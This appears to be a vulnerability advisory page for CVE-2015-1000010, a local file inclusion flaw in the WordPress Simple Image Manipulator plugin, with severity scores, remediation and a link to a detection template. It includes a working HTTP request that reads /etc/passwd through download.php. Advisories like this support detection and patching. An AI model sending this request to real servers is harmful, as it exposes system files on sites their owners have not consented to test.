🔙 목록으로 돌아가기

CVE-2015-1000010: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion

TitleWordPress Simple Image Manipulator < 1.0 - Local File Inclusion
AuthordhiyaneshDK
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read arbitrary files on the server.
RemediationUpdate to the latest version of the WordPress Simple Image Manipulator plugin.
CVSS Score7.5
EPSS Score0.31974
CVE IDCVE-2015-1000010
CWE IDCWE-284
Tags cve2015 cve packetstorm wpscan wordpress wp-plugin lfi wp simple-image-manipulator_project vuln

🔍 Vulnerability Description

WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.

🌐 HTTP Request

GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-1000010.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-1000010.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A